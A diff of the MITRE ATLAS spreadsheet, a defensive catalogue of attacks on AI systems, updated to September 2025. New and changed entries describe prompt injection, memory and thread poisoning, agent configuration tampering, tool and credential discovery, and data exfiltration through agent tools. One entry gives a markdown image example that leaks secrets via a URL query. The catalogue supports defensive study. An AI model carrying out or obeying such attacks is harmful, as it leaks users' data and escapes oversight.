-The same approach may be used to deliver other types of malicious code that don't target AI directly (see [Drive-by Compromise in ATT&amp;CK](https://attack.mitre.org/techniques/T1189/)).</t>
+The same approach may be used to deliver other types of malicious code that don't target AI directly (See [Drive-by Compromise in ATT&amp;CK](https://attack.mitre.org/techniques/T1189/)).</t>
   </si>
   <si>
     <t>Adversaries may embed malicious code into AI Model files.
@@ -1300,6 +1462,10 @@
 It may allow them to achieve Execution, Command &amp; Control, or Exfiltrate Data.</t>
   </si>
   <si>
+    <t>Adversaries may attempt to discover the data sources a particular agent can access.  The AI agent's configuration may reveal data sources or knowledge.
+The embedded knowledge may include sensitive or proprietary material such as intellectual property, customer data, internal policies, or even credentials. By mapping what knowledge an agent has access to, an adversary can better understand the AI agent's role and potentially expose confidential information or pinpoint high-value targets for further exploitation.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Adversaries may degrade the target model's performance with adversarial data inputs to erode confidence in the system over time.
 This can lead to the victim organization wasting time and money both attempting to fix the system and performing the tasks it was meant to automate by hand.
 </t>
@@ -1315,6 +1481,9 @@
     <t>Adversaries can [Craft Adversarial Data](/techniques/AML.T0043) that prevent a AI model from correctly identifying the contents of the data.
 This technique can be used to evade a downstream task where AI is utilized.
 The adversary may evade AI based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.</t>
+  </si>
+  <si>
+    <t>Adversaries may use prompts to invoke an agent's tool capable of performing write operations to exfiltrate data. Sensitive information can be encoded into the tool's input parameters and transmitted as part of a seemingly legitimate action. Variants include sending emails, creating or modifying documents, updating CRM records, or even generating media such as images or videos.</t>
   </si>
   <si>
     <t>Adversaries may exfiltrate private information via [AI Model Inference API Access](/techniques/AML.T0040).
@@ -1416,27 +1585,18 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Adversaries may use their access to an LLM that is part of a larger system to compromise connected plugins.
-LLMs are often connected to other services or resources via plugins to increase their capabilities.
-Plugins may include integrations with other applications, access to public or private data sources, and the ability to execute code.
-This may allow adversaries to execute API calls to integrated applications or plugins, providing the adversary with increased privileges on the system.
-Adversaries may take advantage of connected data sources to retrieve sensitive information.
-They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.
-</t>
-  </si>
-  <si>
     <t>Adversaries may use their acquired knowledge of the target generative AI system to craft prompts that bypass its defenses and allow malicious instructions to be executed.
 The adversary may iterate on the prompt to ensure that it works as-intended consistently.</t>
   </si>
   <si>
-    <t xml:space="preserve">An adversary may craft malicious prompts as inputs to an LLM that cause the LLM to act in unintended ways.
+    <t>An adversary may craft malicious prompts as inputs to an LLM that cause the LLM to act in unintended ways.
 These "prompt injections" are often designed to cause the model to ignore aspects of its original instructions and follow the adversary's instructions instead.
 Prompt Injections can be an initial access vector to the LLM that provides the adversary with a foothold to carry out other steps in their operation.
 They may be designed to bypass defenses in the LLM, or allow the adversary to issue privileged commands.
 The effects of a prompt injection can persist throughout an interactive session with an LLM.
 Malicious prompts may be injected directly by the adversary ([Direct](/techniques/AML.T0051.000)) either to leverage the LLM to generate harmful content or to gain a foothold on the system and lead to further effects.
 Prompts may also be injected indirectly when as part of its normal operation the LLM ingests the malicious prompt from another data source ([Indirect](/techniques/AML.T0051.001)). This type of injection can be used by the adversary to a foothold on the system or to target the user of the LLM.
-</t>
+Malicious prompts may also be [Triggered](/techniques/AML.T0051.002) by user inputs defined by the adversary.</t>
   </si>
   <si>
     <t>Adversaries may hide or otherwise obfuscate prompt injections or retrieval content from the user to avoid detection.
@@ -1446,14 +1606,15 @@
     <t>An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057)).</t>
   </si>
   <si>
-    <t>An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images which automatically make a request to an adversary controlled server, or clickable links which require user interaction.
+    <t>An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images, which automatically make a request to an adversary controlled server. 
+The adversary gets AI to present an image to the user, which is rendered by the user's client application with no user clicks required. The image is hosted on an attacker-controlled website, allowing the adversary to exfiltrate data through image request parameters. Variants include HTML tags and markdown
 For example, an LLM may produce the following markdown:
 ```
-![ATLAS](https://atlas.mitre.org/image.png?secrets=private_data)
+![ATLAS](https://atlas.mitre.org/image.png?secrets="private data")
 ```
 Which is rendered by the client as:
 ```
-&lt;img src="https://atlas.mitre.org/image.png?secrets=private_data"&gt;
+&lt;img src="https://atlas.mitre.org/image.png?secrets="private data"&gt;
 ```
 When the request is received by the adversary's server hosting the requested image, they receive the contents of the `secrets` query parameter.</t>
   </si>
@@ -1476,6 +1637,10 @@
   </si>
   <si>
     <t>Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.</t>
+  </si>
+  <si>
+    <t>Adversaries may manipulate the memory of a large language model (LLM) in order to persist changes to the LLM to future chat sessions. 
+Memory is a common feature in LLMs that allows them to remember information across chat sessions by utilizing a user-specific database. Because the memory is controlled via normal conversations with the user (e.g. "remember my preference for ...") an adversary can inject memories via Direct or Indirect Prompt Injection. Memories may contain malicious instructions (e.g. instructions that leak private conversations) or may promote the adversary's hidden agenda (e.g. manipulating the user).</t>
   </si>
   <si>
     <t>AI-enabled systems often rely on open sourced models in various ways.
@@ -1493,6 +1658,10 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may modify the configuration files for AI agents on a system. This allows malicious changes to persist beyond the life of a single agent and affects any agents that share the configuration.
+Configuration changes may include modifications to the system prompt, tampering with or replacing knowledge sources, modification to settings of connected tools, and more. Through those changes, an attacker could redirect outputs or tools to malicious services, embed covert instructions that exfiltrate data, or weaken security controls that normally restrict agent behavior.</t>
+  </si>
+  <si>
     <t>Adversaries may directly modify an AI model's architecture to re-define it's behavior. This can include adding or removing layers as well as adding pre or post-processing operations.
 The effects could include removing the ability to predict certain classes, adding erroneous operations to increase computation costs, or degrading performance. Additionally, a separate adversary-defined network could be injected into the computation graph, which can change the behavior based on the inputs, effectively creating a backdoor.</t>
   </si>
@@ -1545,6 +1714,12 @@
   </si>
   <si>
     <t>Adversaries may publish a poisoned model to a public location such as a model registry or code repository. The poisoned model may be a novel model or a poisoned variant of an existing open-source model. This model may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010).</t>
+  </si>
+  <si>
+    <t>Adversaries may attempt to use their access to a large language model (LLM) on the victim's system to collect credentials. Credentials may be stored in internal documents which can inadvertently be ingested into a RAG database, where they can ultimately be retrieved by an AI agent.</t>
+  </si>
+  <si>
+    <t>Adversaries may prompt the AI service to retrieve data from a RAG database. This can include the majority of an organization's internal documents.</t>
   </si>
   <si>
     <t>Adversaries may inject malicious content into data indexed by a retrieval augmented generation (RAG) system to contaminate a future thread through RAG-based search results. This may be accomplished by placing manipulated documents in a location the RAG indexes (see [Gather RAG-Indexed Targets](/techniques/AML.T0064)).
@@ -1592,7 +1767,7 @@
   </si>
   <si>
     <t>Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
-Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to proxy traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers. This can be used to bypass a Content Security Policy that prevents retrieving content from arbitrary locations.</t>
+Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers. This can be used to bypass a Content Security Policy which prevent retrieving content from arbitrary locations.</t>
   </si>
   <si>
     <t xml:space="preserve">Societal harms might generate harmful outcomes that reach either the general public or specific vulnerable groups such as the exposure of children to vulgar content.
@@ -1621,7 +1796,7 @@
   </si>
   <si>
     <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](/techniques/AML.T0017)) or obtained ([Obtain Capabilities](/techniques/AML.T0016)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](/techniques/AML.T0008)) or was otherwise compromised by them. Capabilities may also be staged on web services, such as GitHub, model registries, such as Hugging Face, or container registries.
-Adversaries may stage a variety of AI Artifacts including poisoned datasets ([Publish Poisoned Datasets](/techniques/AML.T0019), malicious models ([Publish Poisoned Models](/techniques/AML.T0058)), and prompt injections. They may target names of legitimate companies or products, engage in typosquatting, or use hallucinated entities ([Discover LLM Hallucinations](/techniques/AML.T0062)).</t>
+Adversaries may stage a variety of AI Artifacts including poisoned datasets ([Publish Poisoned Datasets](/techniques/AML.T0019), malicious models ([Publish Poisoned Models](/techniques/AML.T0058), and prompt injections. They may target names of legitimate companies or products, engage in typosquatting, or use hallucinated entities ([Discover LLM Hallucinations](/techniques/AML.T0062)).</t>
   </si>
   <si>
     <t>Adversaries may discover keywords that have special meaning to the large language model (LLM), such as function names or object names. These can later be exploited to confuse or manipulate the LLM into misbehaving and to make calls to plugins the LLM has access to.</t>
@@ -1638,6 +1813,15 @@
 This will help the adversary better understand how that organization is using AI internally and the details of their approach that could aid in tailoring an attack.</t>
   </si>
   <si>
+    <t>Adversaries may introduce malicious instructions into a chat thread of a large language model (LLM) to cause behavior changes which persist for the remainder of the thread. A chat thread may continue for an extended period over multiple sessions.
+The malicious instructions may be introduced via Direct or Indirect Prompt Injection. Direct Injection may occur in cases where the adversary has acquired a user's LLM API keys and can inject queries directly into any thread.
+As the token limits for LLMs rise, AI systems can make use of larger context windows which allow malicious instructions to persist longer in a thread.
+Thread Poisoning may affect multiple users if the LLM is being used in a service with shared threads. For example, if an agent is active in a Slack channel with multiple participants, a single malicious message from one user can influence the agent's behavior in future interactions with others.</t>
+  </si>
+  <si>
+    <t>Adversaries may discover the tools the AI agent has access to. By identifying which tools are available, the adversary can understand what actions may be executed through the agent and what additional resources it can reach. This knowledge may reveal access to external data sources such as OneDrive or SharePoint, or expose exfiltration paths like the ability to send emails, helping adversaries identify AI agents that provide the greatest value or opportunity for attack.</t>
+  </si>
+  <si>
     <t>Proxy models may be trained from AI artifacts (such as data, model architectures, and pre-trained models) that are representative of the target model gathered by the adversary.
 This can be used to develop attacks that require higher levels of access than the adversary has available or as a means to validate pre-existing attacks without interacting with the target model.</t>
   </si>
@@ -1650,6 +1834,9 @@
 </t>
   </si>
   <si>
+    <t>The adversary injects instructions to be followed by the AI system in response to a future event, either a specific keyword or the next interaction. The triggering events can range from simple phrases to complex and covert signals, including encoded or steganographic payloads hidden within seemingly benign content.</t>
+  </si>
+  <si>
     <t>Adversaries may develop unsafe AI artifacts that when executed have a deleterious effect.
 The adversary can use this technique to establish persistent access to systems.
 These models may be introduced via a [AI Supply Chain Compromise](/techniques/AML.T0010).
@@ -1695,6 +1882,15 @@
 </t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0080</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0053</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0085.001</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0035</t>
   </si>
   <si>
@@ -1722,6 +1918,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0002</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0084.002</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0006</t>
   </si>
   <si>
@@ -1764,9 +1963,15 @@
     <t>https://atlas.mitre.org/techniques/AML.T0005</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0083</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0010.002</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0085</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0036</t>
   </si>
   <si>
@@ -1785,6 +1990,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0051.000</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0084</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0007</t>
   </si>
   <si>
@@ -1812,6 +2020,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0018.002</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0084.000</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0031</t>
   </si>
   <si>
@@ -1824,6 +2035,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0015</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0086</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0024</t>
   </si>
   <si>
@@ -1884,9 +2098,6 @@
     <t>https://atlas.mitre.org/techniques/AML.T0054</t>
   </si>
   <si>
-    <t>https://atlas.mitre.org/techniques/AML.T0053</t>
-  </si>
-  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0065</t>
   </si>
   <si>
@@ -1917,12 +2128,18 @@
     <t>https://atlas.mitre.org/techniques/AML.T0074</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0080.000</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0010.003</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/techniques/AML.T0002.001</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0081</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0018.001</t>
   </si>
   <si>
@@ -1956,6 +2173,12 @@
     <t>https://atlas.mitre.org/techniques/AML.T0058</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0082</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0085.000</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0070</t>
   </si>
   <si>
@@ -2010,12 +2233,21 @@
     <t>https://atlas.mitre.org/techniques/AML.T0000.002</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0080.001</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0084.001</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0005.000</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/techniques/AML.T0005.001</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0051.002</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0011.000</t>
   </si>
   <si>
@@ -2040,7 +2272,13 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
-    <t>22 April 2025</t>
+    <t>29 September 2025</t>
+  </si>
+  <si>
+    <t>Persistence</t>
+  </si>
+  <si>
+    <t>Execution, Privilege Escalation</t>
   </si>
   <si>
     <t>Collection</t>
@@ -2058,6 +2296,9 @@
     <t>Initial Access</t>
   </si>
   <si>
+    <t>Discovery</t>
+  </si>
+  <si>
     <t>Reconnaissance</t>
   </si>
   <si>
@@ -2067,12 +2308,12 @@
     <t>Defense Evasion</t>
   </si>
   <si>
-    <t>Discovery</t>
-  </si>
-  <si>
     <t>Execution</t>
   </si>
   <si>
+    <t>Credential Access</t>
+  </si>
+  <si>
     <t>Defense Evasion, Impact, Initial Access</t>
   </si>
   <si>
@@ -2082,12 +2323,6 @@
     <t>Defense Evasion, Privilege Escalation</t>
   </si>
   <si>
-    <t>Execution, Privilege Escalation</t>
-  </si>
-  <si>
-    <t>Persistence</t>
-  </si>
-  <si>
     <t>AI Attack Staging, Persistence</t>
   </si>
   <si>
@@ -2097,9 +2332,6 @@
     <t>Command and Control</t>
   </si>
   <si>
-    <t>Credential Access</t>
-  </si>
-  <si>
     <t>ATLAS</t>
   </si>
   <si>
@@ -2148,49 +2380,49 @@
     <t>AML.TA0003</t>
   </si>
   <si>
-    <t>x-mitre-tactic--388330a4-f142-4895-935c-0fc615225df0</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--07adc703-b1fb-473f-a9e6-ef4fd6a58442</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--af4c8070-9618-4da2-bfec-2cc253f41ae3</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--b370966c-00c6-4b7c-948b-9e1b805bc6da</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--398fa5a9-194c-483e-82d6-9a6b57e3eefc</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--c9cf0175-296e-4439-852d-afb870ed5e0c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--d57d4782-2e85-447d-91a8-0cb8123a4f21</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--1f442889-a32d-4355-b079-54dfaa6564ca</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--cbc44930-843c-41be-b07a-93234ce861c0</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--6086655a-a9dc-4962-87ef-ca7eef261820</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--30a41790-7c46-4913-a7ff-38fadd67c15e</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--fe06fd86-737a-412a-abfd-4b6f38c264d5</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--d900d1a1-0715-4f22-92a0-cf292a2761e4</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--8ed07aa0-b2fb-4267-ad98-84da4669dcec</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--fbc5143a-9d65-44dd-8ff6-1fde80208cf3</t>
+    <t>x-mitre-tactic--5c49a1dd-5474-4311-8404-aad0b56181c0</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--e63eb35a-2d6d-4030-8d5e-324e932685fa</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--c74fa1fc-c62e-44e6-b9d7-4ebf56c1d20f</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--006e2a73-f81a-418d-a041-fc2b49dd23d7</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--0e6771bc-4419-47f9-8360-ba8f5717be49</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--4af500bc-665b-4d94-a1e8-5307cb51c8b4</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--8182f174-1c32-4808-9cd3-daad9eaa2738</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--aff250a6-7df5-4668-a6ad-e0dc0c06cc58</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--5eea0386-d5f1-461d-ae46-e28746af5404</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--de9f7ce6-b0e8-4e41-bb8c-2192112180ec</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--27fc1ed4-f4c4-4d3e-9977-3502218744f2</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--de87bf3d-cbd2-4861-a7fd-17c3ff2d3c30</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--038bd769-e805-47fd-a065-c3430b8de30b</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--983578ee-75d0-4745-a0d8-875b9219d240</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--385bacea-c682-4391-aab0-9ac0525c9866</t>
   </si>
   <si>
     <t>Privilege Escalation</t>
@@ -2416,82 +2648,82 @@
     <t>AML.M0016</t>
   </si>
   <si>
-    <t>course-of-action--d28fd806-c567-4cce-bcef-4981908f8dbc</t>
-  </si>
-  <si>
-    <t>course-of-action--0ecbe6e0-865e-439c-925b-da558632bda6</t>
-  </si>
-  <si>
-    <t>course-of-action--c887ee08-5448-41bb-a94a-e53bfedfa8b7</t>
-  </si>
-  <si>
-    <t>course-of-action--99b7b032-7353-436b-a200-f52fca92cb11</t>
-  </si>
-  <si>
-    <t>course-of-action--73e8d31a-5f48-4415-8f74-4f443a853050</t>
-  </si>
-  <si>
-    <t>course-of-action--35a8cc31-c63d-4fb9-90c0-1dbba7bc724a</t>
-  </si>
-  <si>
-    <t>course-of-action--8ec8b9e0-1934-4298-a1b3-f7c90bd9d864</t>
-  </si>
-  <si>
-    <t>course-of-action--633d5427-a2a6-4453-8675-7378e1b870e2</t>
-  </si>
-  <si>
-    <t>course-of-action--ed266799-ad60-4515-a112-fb668d12cc07</t>
-  </si>
-  <si>
-    <t>course-of-action--e0135277-437f-4b2f-a2bd-66eee71c15e5</t>
-  </si>
-  <si>
-    <t>course-of-action--b45ca9a8-2fe5-467b-b431-b9214c4f3e9b</t>
-  </si>
-  <si>
-    <t>course-of-action--2310ea30-59c9-425c-8ca7-826d267555df</t>
-  </si>
-  <si>
-    <t>course-of-action--d9f92e31-bd25-4e24-8e09-a6dadcfd8020</t>
-  </si>
-  <si>
-    <t>course-of-action--c2885145-a7d5-4100-983d-4d6de9f26425</t>
-  </si>
-  <si>
-    <t>course-of-action--56c77b01-667d-4f45-83f6-8c25e23b7e4c</t>
-  </si>
-  <si>
-    <t>course-of-action--d7a6bd67-982c-4fc0-91ec-8bf86b156055</t>
-  </si>
-  <si>
-    <t>course-of-action--4981d26b-37c3-42be-83ff-298b1fb7710f</t>
-  </si>
-  <si>
-    <t>course-of-action--564257e2-a859-4a6b-b01a-0a997fe06590</t>
-  </si>
-  <si>
-    <t>course-of-action--6b033c58-3eb4-4afb-97d1-f4ea00ae2849</t>
-  </si>
-  <si>
-    <t>course-of-action--de16f78e-92bc-427d-92da-6f71bf0a4418</t>
-  </si>
-  <si>
-    <t>course-of-action--cf12cfaa-408e-4bd0-85fb-9e068dc8699a</t>
-  </si>
-  <si>
-    <t>course-of-action--7de8e8c2-de8d-4000-b87f-385d36e1bf81</t>
-  </si>
-  <si>
-    <t>course-of-action--4237c0ff-cea4-42bd-8419-9f05ea23798b</t>
-  </si>
-  <si>
-    <t>course-of-action--50791788-7055-4498-9b8e-24737141921f</t>
-  </si>
-  <si>
-    <t>course-of-action--7ae9540a-f380-495a-8a5a-5413378defd5</t>
-  </si>
-  <si>
-    <t>course-of-action--ff8b3c2e-aeab-4d66-a7bf-86058bb77ed3</t>
+    <t>course-of-action--51df827f-516e-4c39-b145-76b81299ec52</t>
+  </si>
+  <si>
+    <t>course-of-action--b5ef966a-63d6-42dd-ad9f-815517a04e8f</t>
+  </si>
+  <si>
+    <t>course-of-action--65d103b8-03fa-486e-a763-ee0166095508</t>
+  </si>
+  <si>
+    <t>course-of-action--c2fed5ee-3e46-4465-a124-bce368826b7e</t>
+  </si>
+  <si>
+    <t>course-of-action--716c79ec-309d-46f6-a8ec-0d8361e34e58</t>
+  </si>
+  <si>
+    <t>course-of-action--784c2fb0-5a3d-43b3-b881-d56fb24ad51c</t>
+  </si>
+  <si>
+    <t>course-of-action--cf7a9fd6-f23d-4f9b-9a98-1c047aada908</t>
+  </si>
+  <si>
+    <t>course-of-action--08498ebf-daea-4c8f-be90-f976b408fc88</t>
+  </si>
+  <si>
+    <t>course-of-action--fbb1e321-c0b8-402a-a911-ea456ce99b34</t>
+  </si>
+  <si>
+    <t>course-of-action--bdc27f02-8925-46b5-b602-a3fd288c8e68</t>
+  </si>
+  <si>
+    <t>course-of-action--b304e8ce-46d3-4d1b-b849-9e9252cd7ad4</t>
+  </si>
+  <si>
+    <t>course-of-action--e8c1e0e9-833a-4d82-ab1d-c85571d6700e</t>
+  </si>
+  <si>
+    <t>course-of-action--41790108-f5a6-4a4c-960e-6aad7c6400ad</t>
+  </si>
+  <si>
+    <t>course-of-action--77b0693c-f61f-434e-9a9d-95c7b0ecea6f</t>
+  </si>
+  <si>
+    <t>course-of-action--f4ff76ff-2534-40a2-b787-b6b1b29a0273</t>
+  </si>
+  <si>
+    <t>course-of-action--b401966e-0f8d-47fa-a9c8-b3e203bb9b3c</t>
+  </si>
+  <si>
+    <t>course-of-action--c72d54b4-ece7-4043-b515-391145836b68</t>
+  </si>
+  <si>
+    <t>course-of-action--ab49fe8d-a63c-49ef-b8eb-e670a3d1e98e</t>
+  </si>
+  <si>
+    <t>course-of-action--664c2d35-9090-4322-b8d6-e056e8325573</t>
+  </si>
+  <si>
+    <t>course-of-action--05f1c700-7468-4398-82a4-30e2a9913c3f</t>
+  </si>
+  <si>
+    <t>course-of-action--b6235cea-ce60-41da-827f-fcb75aa006b0</t>
+  </si>
+  <si>
+    <t>course-of-action--60684533-200a-44a8-926b-69f304b25bc4</t>
+  </si>
+  <si>
+    <t>course-of-action--6e25b8c1-c7f9-44de-977b-c37568d83e02</t>
+  </si>
+  <si>
+    <t>course-of-action--2a7461ae-c975-46a4-bfe1-42bc8719510a</t>
+  </si>
+  <si>
+    <t>course-of-action--0b60e7b4-e979-41ca-b10d-7e732b58f472</t>
+  </si>
+  <si>
+    <t>course-of-action--47dd59e6-a681-4899-b308-a1e20ea60d81</t>
   </si>
   <si>
     <t>AI Bill of Materials</t>
@@ -2661,7 +2893,7 @@
     <t>Educate AI model developers on secure coding practices and AI vulnerabilities.</t>
   </si>
   <si>
-    <t>Validate that AI models perform as intended by testing for backdoor triggers or adversarial bias.
+    <t>Validate that AI models perform as intended by testing for backdoor triggers or adversarial influence.
 Monitor model for concept drift and training data drift, which may indicate data tampering and poisoning.</t>
   </si>
   <si>
@@ -3159,7 +3391,7 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:I116"/>
+  <dimension ref="A1:I131"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0"/>
   </sheetViews>
@@ -3199,28 +3431,28 @@
         <v>9</v>
       </c>
       <c r="B2" t="s">
-        <v>124</v>
+        <v>139</v>
       </c>
       <c r="C2" t="s">
-        <v>239</v>
+        <v>269</v>
       </c>
       <c r="D2" t="s">
-        <v>354</v>
+        <v>399</v>
       </c>
       <c r="E2" s="2" t="s">
-        <v>469</v>
+        <v>529</v>
       </c>
       <c r="F2" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="G2" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="H2" t="s">
-        <v>585</v>
+        <v>660</v>
       </c>
       <c r="I2" t="s">
-        <v>604</v>
+        <v>679</v>
       </c>
     </row>
     <row r="3" spans="1:9">
@@ -3228,28 +3460,28 @@
         <v>10</v>
       </c>
       <c r="B3" t="s">
-        <v>125</v>
+        <v>140</v>
       </c>
       <c r="C3" t="s">
-        <v>240</v>
+        <v>270</v>
       </c>
       <c r="D3" t="s">
-        <v>355</v>
+        <v>400</v>
       </c>
       <c r="E3" s="2" t="s">
-        <v>470</v>
+        <v>530</v>
       </c>
       <c r="F3" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="G3" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="H3" t="s">
-        <v>586</v>
+        <v>661</v>
       </c>
       <c r="I3" t="s">
-        <v>604</v>
+        <v>679</v>
       </c>
     </row>
     <row r="4" spans="1:9">
@@ -3257,28 +3489,28 @@
         <v>11</v>
       </c>
       <c r="B4" t="s">
-        <v>126</v>
+        <v>141</v>
       </c>
       <c r="C4" t="s">
-        <v>241</v>
+        <v>271</v>
       </c>
       <c r="D4" t="s">
-        <v>356</v>
+        <v>401</v>
       </c>
       <c r="E4" s="2" t="s">
-        <v>471</v>
+        <v>531</v>
       </c>
       <c r="F4" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="G4" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="H4" t="s">
-        <v>587</v>
+        <v>662</v>
       </c>
       <c r="I4" t="s">
-        <v>604</v>
+        <v>679</v>
       </c>
     </row>
     <row r="5" spans="1:9">
@@ -3286,28 +3518,28 @@
         <v>12</v>
       </c>
       <c r="B5" t="s">
-        <v>127</v>
+        <v>142</v>
       </c>
       <c r="C5" t="s">
-        <v>242</v>
+        <v>272</v>
       </c>
       <c r="D5" t="s">
-        <v>357</v>
+        <v>402</v>
       </c>
       <c r="E5" s="2" t="s">
-        <v>472</v>
+        <v>532</v>
       </c>
       <c r="F5" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="G5" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="H5" t="s">
-        <v>588</v>
+        <v>662</v>
       </c>
       <c r="I5" t="s">
-        <v>604</v>
+        <v>679</v>
       </c>
     </row>
     <row r="6" spans="1:9">
@@ -3315,28 +3547,28 @@
         <v>13</v>
       </c>
       <c r="B6" t="s">
-        <v>128</v>
+        <v>143</v>
       </c>
       <c r="C6" t="s">
-        <v>243</v>
+        <v>273</v>
       </c>
       <c r="D6" t="s">
-        <v>358</v>
+        <v>403</v>
       </c>
       <c r="E6" s="2" t="s">
-        <v>473</v>
+        <v>533</v>
       </c>
       <c r="F6" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="G6" t="s">
-        <v>584</v>
+        <v>659</v>
       </c>
       <c r="H6" t="s">
-        <v>589</v>
+        <v>663</v>
       </c>
       <c r="I6" t="s">
-        <v>604</v>
+        <v>679</v>
